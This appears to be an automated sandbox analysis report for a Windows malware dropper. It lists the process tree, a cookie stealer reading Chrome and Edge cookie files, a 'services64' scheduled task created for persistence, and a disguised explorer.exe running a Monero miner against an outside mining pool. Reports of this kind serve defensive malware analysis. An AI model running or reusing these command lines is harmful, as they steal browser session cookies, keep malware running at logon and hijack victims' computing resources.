PID 2040 wrote to memory of 2716 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_9.exe
PID 1128 wrote to memory of 3000 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_1.exe
PID 4204 wrote to memory of 4956 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.exe
PID 2016 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_5.exe C:\Users\Admin\AppData\Local\Temp\is-995TT.tmp\jobiea_5.tmp
PID 2716 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_9.exe C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
PID 2712 wrote to memory of 4280 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe
PID 4956 wrote to memory of 3320 N/A C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.exe C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\a2932135d6a95b6756ca3cbf02b8a549_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_3.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c jobiea_9.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_5.exe

jobiea_5.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_3.exe

jobiea_3.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_6.exe

jobiea_6.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_2.exe

jobiea_2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_4.exe

jobiea_4.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_9.exe

jobiea_9.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_1.exe

jobiea_1.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.exe

jobiea_8.exe

C:\Users\Admin\AppData\Local\Temp\is-995TT.tmp\jobiea_5.tmp

"C:\Users\Admin\AppData\Local\Temp\is-995TT.tmp\jobiea_5.tmp" /SL5="$70054,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_5.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3096 -ip 3096

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_7.exe

jobiea_7.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 560

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.exe

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_8.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /DeleteCookiesWildcard "*.facebook.com"

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_1.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC6393BA7\jobiea_1.exe" -a

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1732633222 0

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 840 -ip 840

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 840 -s 356

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2664 -ip 2664

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 1912

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2664 -ip 2664

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 1900

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

Network


Files
